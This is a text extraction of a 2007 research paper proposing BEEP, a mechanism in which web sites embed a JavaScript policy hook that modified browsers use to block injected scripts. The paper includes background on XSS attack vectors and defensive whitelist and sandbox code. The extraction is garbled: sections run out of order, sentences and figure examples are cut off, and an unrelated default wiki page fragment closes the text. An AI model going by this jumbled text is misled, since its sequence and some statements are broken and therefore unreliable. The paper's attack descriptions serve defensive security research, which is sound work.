WWW 2007 / Track: Security, Privacy, Reliability, and Ethics
Session: Defending Against Emerging Threats
Defeating Script Injection Attacks with Browser-Enforced Embedded Policies
Trevor Jim
AT&T Labs Research
Nikhil Swamy
University of Mar yland, College Park
Michael Hicks
University of Mar yland, College Park
ABSTRACT
Web sites that accept and display content such as wiki articles or comments typically filter the content to prevent injected script code from running in browsers that view the site. The diversity of browser rendering algorithms and the desire to allow rich content make filtering quite difficult, however, and attacks such as the Samy and Yamanner worms have exploited filtering weaknesses. This paper proposes a simple alternative mechanism for preventing script injection called Browser-Enforced Embedded Policies (BEEP). The idea is that a web site can embed a policy in its pages that specifies which scripts are allowed to run. The browser, which knows exactly when it will run a script, can enforce this policy perfectly. We have added BEEP support to several browsers, and built tools to simplify adding policies to web applications. We found that supporting BEEP in browsers requires only small and localized modifications, modifying web applications requires minimal effort, and enforcing policies is generally lightweight.
site itself, to remove scripts and other potentially harmful elements [23, 32, 21]. Filtering is complicated in practice. Sites want to allow their users to provide rich content, with images, hyperlinks, typographic stylings and so on. Scripts can be embedded in rich content in many ways, and it is nontrivial to disable the scripts without also disabling the rich content. One reason is that different browsers parse and render content differently: filtering that is effective for one browser can be ineffective for another. Moreover, browsers try to be forgiving, and can parse and render wildly malformed content, in unexpected ways. All of these complications have come into play in real attacks that have evaded server-side filtering (e.g., the Samy [30] and Yamanner [3] worms). We propose a new technique to prevent script injection attacks, based on the following two observations: Observation 1: Browsers perform perfect script detection. If a browser does not parse content as a script while it renders a web page, that content will not be executed. Observation 2: The web application developer knows exactly what scripts should be executed for the application to function properly. The first observation implies that the browser is the ideal place to filter scripts. Indeed, for some web applications (e.g., GPokr, S3AjaxWiki), most or all of the application logic is executed in the browser, with the web site acting only as a data store. For these applications, browser-side filtering may be the only option. The second observation implies that the web site should supply the filtering policy to the browser--it can specify which scripts are approved for execution and the browser will filter the rest. In short, the web site sets the policy and the browser enforces it. We call this strategy BrowserEnforced Embedded Policies (BEEP). There are many possible ways to implement BEEP. In this paper, we have used a method that is easy to implement while still permitting very general policies. In our implementation, the security policy is expressed as a trusted JavaScript function that the web site embeds in the pages it serves. We call this function the security hook. A suitablymodified browser passes each script it detects to the security hook during parsing (along with other relevant information) and will only execute the script if the hook approves it. Our implementation of BEEP has several advantages. Flexible p olicies. The security hook can be any function that can be implemented in JavaScript. So far we have
Categories and Subject Descriptors
K.6.5 [Management of Computing and Information Systems]: Security and Protection--unauthorized access, invasive software
General Terms
Security
Keywords
Script injection, cross-site scripting, web application security
1. INTRODUCTION
Many web sites republish content supplied by their user communities, or by third parties such as advertising networks and search engines. If this republished content contains scripts, then visitors to the site can be exposed to attacks such as cross-site scripting (XSS) [2], and can themselves become participants in attacks on the web site and on others [16]. The standard defense is for the web site to filter or transform any content that does not originate from the
Copyright is held by the International World Wide Web Conference Committee (IW3C2). Distribution of these papers is limited to classroom use, and personal use by others. WWW 2007, May 812, 2007, Banff, Alberta, Canada. ACM 978-1-59593-654-7/07/0005.
601
WWW 2007 / Track: Security, Privacy, Reliability, and Ethics
implemented two simple kinds of policies (but we are not restricted to these policies). Our first policy is a whitelist, in which the hook function includes a one-way hash of each legitimate script appearing in the page. When a script is detected in the browser and passed to the hook function, the hook function hashes the script and matches it against the whitelist; any script whose hash is not in the list is rejected. Our second policy is a DOM sandbox. Here, the web application structures its pages to identify content that might include malicious scripts. The possibly-malicious user content is placed inside of a
or
element that acts as a sandbox: . . . possibly-malicious content. . .
Within the sandbox, rich content (typographic styling, etc.) is enabled, but all scripts are disabled. When invoked, the hook function will examine the document in its parsed representation, a Document Ob ject Model (DOM) tree. Beginning at the DOM node of the script, the hook function inspects all of the nodes up to the root of the tree, looking for "noexecute" nodes. If such a node is found, the script is not executed.1 While these policies are sufficient to stop injected scripts, other policies are also possible. For example, the hook function could also notify the web site when an injected script is found. A hook function could even analyze scripts and permit only a restricted class of scripts to execute. Policies can be easily modified over time: the new policy is simply embedded in the site's pages and will be enforced by browsers from then on. Complete coverage. With policies like the whitelist and DOM sandbox, BEEP detects and filters all injected scripts, under two conditions. First, to use these policies, all approved scripts must be identified by the web site in advance either directly (by enumerating them) or indirectly (by identifying where scripts cannot occur); this is straightforward for most applications (and is discussed in more detail in Sections 3.5 and 4.2). Second, the browser must install the security hook before any other scripts on the page are executed, to ensure complete mediation. This is easily accomplished: defining the hook as the first script in the document head ensures it will be parsed first. Together, these conditions imply that any non-approved script will be rejected before it has a chance to run. Ease of deployment. Our method requires browser modifications, but has been chosen to minimize them. For example, the places where browsers need to be modified are easily identified: we simply locate places in the source code where the browser invokes the JavaScript interpreter. These are the points where the browser has identified a script in a web page. At this point in the source code, the browser has gathered together all of the information needed to invoke the JavaScript interpreter, and we only need to insert code to invoke the interpreter on our security hook function first. Depending on the result of this first invocation, we will either execute the script from the page, or skip it. We successfully modified the Konqueror and Safari browsers to support security hooks, and we implemented partial support
1 We must take care to prevent cleverly formatted content from escaping its confines as discussed in Section 3.4.
Session: Defending Against Emerging Threats
Users
Browser (attacker)
Network
Server enter rich content (including malicious scripts) data entry form
Web site
(possible filter)
Browser (victim) script interpreter cookies
storage request view displayed content (including unfiltered malicious scripts) data view page
Figure 1: Script injection attack on a typical Wiki/Blog-based site, like MySpace. in the closed-source Opera browser. These changes required just over 650 lines of code in the first two cases (compared to several hundred thousand for the browsers' rendering engines), and just over 100 lines of JavaScript for Opera. Web applications must also be modified to use BEEP, but the changes are simple and localized. We will show how we modified some existing web applications to embed policies, and describe some simple tools we built to help in this process. Finally, deployment can proceed incrementally. Browsers that do not support hooks will still render pages that define hooks, albeit without the protection they offer. Servers can (and should) continue to filter user content, with BEEP serving as a second line of defense against scripts that escape detection. Moreover, while we intend that web sites be responsible for embedding appropriate policies, policies could also be embedded by other means. For example, a third party could generate a whitelist for an infected site, and a firewall or other proxy could insert the whitelist policy into pages served from that site. Mo derate overhead. When a browser renders a BEEPenabled web page, there is some additional overhead for parsing the security hook function and executing the hook function whenever a script is parsed. After running some simple experiments we found that rendering overheads averaged 14.4% for whitelist policies and 6.6% for sandbox policies, typically amounting to a fraction of a second. These percentages do not include network time, which would further reduce overhead if accounted for. The next section presents some background, and the remainder of the paper explains our BEEP technique and policies, describes our implementation, and presents experimental results. The paper concludes by comparing BEEP to related work.
2. BACKGROUND
Script injection, or cross-site scripting, is a very common vulnerability: according to MITRE's CVE list [20], it is the most common class of reported vulnerabilities, surpassing buffer overflows starting in 2005. Here we review script injection attacks and illustrate why it is difficult to filter scripts using standard server-side techniques.
2.1 Script Injection
We are concerned with attacks that cause a malicious
602
WWW 2007 / Track: Security, Privacy, Reliability, and Ethics
1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15.
Session: Defending Against Emerging Threats
...
]]>
Figure 2: Ways of emb edding scripts in web pages.
script, typically written in JavaScript, to be injected into the content of a trusted web site. When a visitor views a page on the site, the injected script is loaded and executed in the visitor's browser with the trusted site's privileges. The injected script can leak privileged information (cookies, browsing history, and, potentially, any private content from the site) [2]. The script can also use the visitor's browser to carry out denial of service attacks or other attacks on the web site, or on others. If the web site is very popular, the attack can be greatly amplified [16]. Script injection can be achieved in many ways. In crosssite scripting (XSS), the attacker often exploits web sites that insert user-provided text into pages without properly filtering the text. For example, members of on-line communities like MySpace, Blogger, and Flickr can enter their own content and add comments to the content of others. This content is stored on the site and may be viewed by anyone. If a malicious member manages to include a script in his content, any viewers of that content would run the script with the privileges of the site. And if a viewer were also a member of the site, the script could access or modify the viewer's content, including private information stored at the site or at the browser (e.g., as a cookie). Such an attack is shown in Figure 1. Another way of injecting a script is by "reflection." For example, when asked for a non-existent page, many sites try to produce a helpful "not found" response that includes the URL of the non-existent page that was requested. Therefore, if the site is not careful, an occurrence of the text in the URL can be executed in the visitor's browser when it renders the "not found" page. To exploit this, an attacker can try to entice victims to follow URLs with targets that include scripts, e.g.,
http://trusted.site/
nature of JavaScript-enabled web pages, where the HTML content served from the web server is altered in the browser by the execution of scripts. For instance, a site might be constructed so that a URL of the form
http://vulnerable.site/welcome.html?name=Joe
produces personalized content using a static HTML page in combination with an embedded script. In particular, the script can use features like innerHTML and document.write to modify the content of the page at the browser, personalized according the value of "name." This opens the possibility that a malicious script can be constructed entirely in the browser, as a combination of "name" and other parameter values, as well as the text of the page itself. This can be taken to an extreme: web applications like S3AjaxWiki [22] have no server-side logic at all. The application logic consists entirely of JavaScript code that executes in the browser, and the server is used solely as a data store. In this case, clearly any measures to combat malicious scripts must be taken in the browser (and S3AjaxWiki currently provides no such measures).
2.2 Script Detection
The standard solution to script injection is for the web site to filter or transform all possibly-malicious content so that scripts are removed or made harmless, as shown in Figure 1. The simplest kind of filter is to escape the special characters in the content to prevent scripts, if any, from executing in the browser. For example, if some content contains "">
3.2 The Security Hook
In our implementation of BEEP, a web site specifies its policy through a security hook that will be used to approve scripts before execution in the browser. The hook is communicated to the browser as the definition of a JavaScript function, afterParseHook. A specially-modified browser invokes afterParseHook whenever it parses a script while rendering pages. (The necessary browser modifications will be described shortly.) If the hook function returns true then the script is deemed acceptable and will be executed; otherwise it will be ignored.
executes in some browsers.
2.3
Real world examples
All of these issues--multiple vectors, encodings, and quirks in browsers--make script detection a hard problem, and give rise to dozens of techniques for hiding scripts from detection,
604
WWW 2007 / Track: Security, Privacy, Reliability, and Ethics
The security hook must implement complete mediation to be an effective defense: no script may escape scrutiny by the security hook before the script runs. This implies that the hook function must be installed before any malicious scripts are parsed and executed. While the HTML standard does not specify the order of parsing and execution, we have verified that in practice the ma jor browsers parse and execute the first We call this trick node-splitting ; similar tricks are used to illegally access hidden files in web servers (using .. in URLs) and to perform SQL injections. A simple variation solves the problem. The web application arranges for all possibly-malicious content to be encoded as a JavaScript string, and to be inserted as HTML into the document by a script, using innerHTML:
the browser invokes afterParseHook on the text of the script, i.e., "alert('hello')" and the DOM node of the element. The policy implemented by the hook function can be any boolean function that can be programmed in JavaScript. We have experimented with two kinds of policies: whitelists and DOM sandboxes. We discuss these next.
3.3
Whitelists
Most current web applications embed scripts in their web pages. Typically, the web application developer knows precisely which scripts belong in each page (but see Section 3.5). Therefore, the developer can write a security hook that checks that every script encountered by the browser is one of these known scripts; in other words, a whitelist policy. We implement a whitelist in JavaScript as an associative array indexed by the SHA-1 hashes of the known scripts. When afterParseHook is invoked on a script, it hashes the script and checks whether the hash appears in the array. For example, if the script is known, then whitelist [SHA1("alert(0)")] should be defined; if an included script such as is known, then whitelist [SHA1("aURL")] should be defined. Here is a sample implementation:
if (window.JSSecurity) { JSSecurity.afterParseHook = function(code, elt) { if (whitelist[SHA1(code)]) return true; else return false; }; whitelist = new Object(); whitelist["478zB3KkS+UnP2xz8x62ugOxvd4="] = 1; whitelist["AO0q/aTVjJ7EWQIsGVeKfdg4Gdo="] = 1; ... etc. ... }
The SHA1 function could be defined as part of the script in which the above code appears, or it could be part of library provided by the browser to security hooks. The latter is clearly preferable: while JavaScript versions of cryptographic functions exist [12], they perform far worse than native implementations (cf. Section 5.2).
Here the "noexecute" node is created separately from its contents, so that there is no possibility of the contents splitting the node. The assignment of the string to the innerHTML property of the node causes the browser to parse and render the string as HTML, producing a DOM tree with the node as parent, even when the string contains a
that attempts to prematurely close the tag of the "noexecute" node. The rules for quoting special characters in JavaScript strings are simple, so there is no possibility of malicious content escaping from the string. HTML frames cause an additional complication. A frame in a document introduces a child document. If an attacker injects a script included in a frame, our hook reaches the top of the frame without encountering the sandbox node,
605
WWW 2007 / Track: Security, Privacy, Reliability, and Ethics
and must continue searching in the parent document. The DOM does not provide easy access from the child to its place in the parent, so our hook must do some searching in the parent document to find the frame element. The complete implementation is available at the BEEP web site [10].
Session: Defending Against Emerging Threats
the HTML and JavaScript engines. This interface is bidirectional--the HTML engine invokes the JavaScript interpreter to execute scripts that it encounters while parsing the document, and a JavaScript function can modify the document tree that is managed by the HTML engine. To implement afterParseHook, we had to take special care to ensure that certain modifications to the document tree that occur due to the execution of JavaScript do not result in invocations of the hook function. For instance, if a JavaScript function (already authorized by afterParseHook) chooses to insert a dynamically-generated script into the document we must ensure that the hook function is not called once again. The ma jority of changes (in terms of lines of code) in both browsers were due to a small refactoring that was necessary to handle this case. DOM sandboxing required some additional changes. To enforce DOM sandboxing, the afterParseHook must traverse the document tree from the location of the script towards the root of the tree. However, in a few cases the HTML parsers in Safari and Konqueror do not maintain a well-formed document tree when parsing JavaScript. This occurs, for instance, when parsing scripts that appear in the attributes of HTML elements, and this prevents the hook from determining whether or not a script is contained within a "noexecute" node. Therefore, we changed the HTML parsers to make the DOM tree well-formed in these cases. Note that the ECMA and DOM standards for JavaScript and HTML do not require the document tree to be well formed during parsing. Op era. We also implemented partial support for our hooks in a closed-source browser, Opera. Opera supports a feature called User JavaScripts intended to allow users to customize the web pages of arbitrary sites. For example, if a web site relies on non-standard behavior of Internet Explorer, an Opera user can write a User JavaScript that is invoked whenever a page from the site is rendered, and which rewrites the page content so that it renders correctly in Opera. The User JavaScript programming interface permits registering JavaScript callback functions to handle events that occur during parsing and rendering. Crucially, User JavaScript is executed before any scripts on the web page, and it can prevent any script on the web page from executing. We have written a User JavaScript for Opera that does two things. First, it defines a JSSecurity ob ject for every web page, within which a web page can register its afterParseHook function. Second, it registers a handler function that calls the user's JSSecurity.afterParseHook (if it exists) on script execution events. The Opera implementation handles ...
StartPage
This is the default page content. You should edit this.